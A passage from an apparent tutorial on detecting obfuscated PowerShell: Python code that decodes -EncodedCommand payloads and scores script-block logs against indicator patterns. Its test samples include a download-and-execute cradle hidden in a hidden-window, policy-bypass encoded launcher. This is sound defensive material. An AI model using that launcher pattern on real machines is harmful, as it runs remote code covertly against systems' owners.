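    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-ex(?:ecutionpolicy)?\s+bypass|-nop\b|-noprofile\b", re.I),
}


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind -EncodedCommand, if any."""
    match = ENC_ARG.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_script_block(text: str) -> List[str]:
    """Indicators present in the text, including those inside an encoded payload."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    decoded = decode_encoded_command(text)
    if decoded:  # the payload is scored too, so encoding a cradle does not hide it
        hits += [f"decoded:{hit}" for hit in score_script_block(decoded)]
    return hits


def triage(events: List[Dict], threshold: int = 2) -> List[Tuple[int, List[str]]]:
    """(RecordId, hits) for events whose text trips at least `threshold` indicators."""
    return [(e["RecordId"], hits) for e in events
            if len(hits := score_script_block(e["ScriptBlockText"])) >= threshold]


# Constructed samples: two routine admin commands and one launcher that hides a
# download-and-execute cradle inside an encoded command (TEST-NET address).
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.5/a.ps1')"
SAMPLE_B64 = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"RecordId": 1, "ScriptBlockText": r"Get-ChildItem C:\Users\alice\Documents | Measure-Object"},
    {"RecordId": 2, "ScriptBlockText": r"Invoke-WebRequest https://example.com/x.msi -OutFile C:\Temp\x.msi"},
    {"RecordId": 3, "ScriptBlockText": f"powershell.exe -nop -w hidden -enc {SAMPLE_B64}"},
]

if __name__ == "__main__":
    for record_id, hits in triage(SAMPLE_EVENTS):
        print(f"record {record_id}: {', '.join(hits)}")
```

With the default threshold only record 3 is reported; lowering it to 1 also surfaces the single download indicator in record 2, which is the trade-off between coverage and noise that tuning has to settle.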

Additional Resources

Excellent technical write-up on Powershell Security:

Recent article on this threat: